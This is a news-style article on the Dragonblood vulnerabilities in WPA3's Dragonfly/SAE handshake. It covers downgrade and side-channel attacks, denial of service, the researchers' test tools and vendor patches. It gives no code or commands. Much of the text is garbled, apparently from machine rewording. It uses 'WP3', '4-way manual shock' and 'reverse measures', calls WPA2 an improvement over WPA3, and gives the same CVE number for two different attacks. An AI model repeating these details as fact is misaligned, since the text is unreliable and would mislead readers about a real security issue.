Security researchers discovered a new WPA3 Protocol vulnerability called “Dragonblood,” which enables WP3-enabled WiFi Network hackers to steal WiFi Password.
In the WPA3 protocol, cybersecurity cracks password and use encrypted traffic to steal sensitive information such as credit card numbers, passwords, chat messages, e-mails. This is a serious vulnerability.
So What Is Dragonblood?
Wi-Fi Alliance recently announced the WPA3 protocol, claiming it is impossible to break your network password due to the powerful Dragonfly handshake.
Most networks still use 14-year-old WPA2 protocols that are vulnerable to attacking Krack. Since then, WPA3 has been announcing an increase in security for personal and corporate Wi-Fi networks.
For those who don’t know, these attacks resemble the popular brute-forcing dictionary attacks combined with caching abuse of side-channel leaks. “This allows the opponent to impersonate any person without knowing the password of the user and thus access the Wi-Fi network,” researchers said.
The researchers suggested that the WPA3 protocol does not meet the standards for ensuring the security of our WiFi networks and that further improvements are needed. The WPA2 standard, however, was called an improvement.
Five major vulnerabilities are identified in the paper. For the first time, the researchers have shown that SAE’s anti-clogging mechanisms can be avoided to cause service denial.
“In particular, a resource-constrained device can overload the CPU in a professional access point by abusing the overhead of SAE’s defenses against already known side channels.”
Design Flaw In WPA3 Dragonblood Vulnerability
In this case, two different WPA3 Protocol design defects are discovered, and both vulnerabilities may be abused to steal the password from the target Wi-Fi network by the attacker.
- Downgrade Attacks
- Side-channels leaks
Since WP3 enabled WiFi Network supports WP2 and WPA3, it can connect an attacker to offline Dictionary Attack with a WPA2 4-way manual shock by setting a rogue access point that only supports WPA2.
Researchers said, “Even if the customer detects the 4-way handshake downgrade-to-WPA 2, it’s too late. Four-way handshake messages that were exchanged prior to downgrade are enough to start an offline dictionary attack.
The second fault, a leak in Side Channels, allows attackers to attack the side channel and the Time-Based Side channel due to vulnerabilities in the Dragonfly handshake.
Attack CVE-2019-9494 side-channel based on the cache. Let attackers use the victim machine with unprivileged code and this attack allows the branch to be identified in the first iteration of Dragonfly’s Password Generation Algorithm.
Attack CVE-2019-9494 abuses the Dragonfly handshake password encoding algorithm to perform the same password dividing attack, similar to an offline dictionary assault, also in time-based side channels.
Two scientists, Mathy Vanhoef (NYUAD) and Eyal Ronen (Tel Aviv University & KU Leuven), who discovered this vulnerability, produced scripts to test certain vulnerabilities found in the WPA3 Protocol. The following in this case:
- Dragonslayer: Implements EAP-pwd attacks (soon to be released).
- Dragondrain: This tool can be used to test the extension of the Access Point vulnerability to SAE SAE handshake denial-of-service attacks.
- Dragontime: If the handshake MODP group 22, 23 or 24 is used, this is an experimental tool for conducting time-consuming attacks. Note that these groups are not enabled by most WPA3 implementations by default.
- Dragonforce: This is an experimental tool that collects information and performs a password partitioning attack from our time or cache-based attacks. It’s like a dictionary attack.
Security Patches Already Being Deployed By Device Manufacturers
The scientists conclude the paper “Dragonblood: Security Analysis of WPA3 SAE Handshake” by saying that “a more open process would have prevented (or clarified) the possibility of a reduction in the attack against the WPA3 transition mode.
“These issues can be mitigated without affecting devices’ ability to cooperate well,” the press release of the Wi-Fi Alliance states.
“There is no evidence that these vulnerabilities have been exploited,” as well as “the affected device manufacturers have already implemented patches to solve the problem.”
In addition, the WiFi Alliance, the CERT / CC and the researchers were notified to all affected WPA3 vulnerability vendors using Vanhoef and Ronen to implement reverse measures.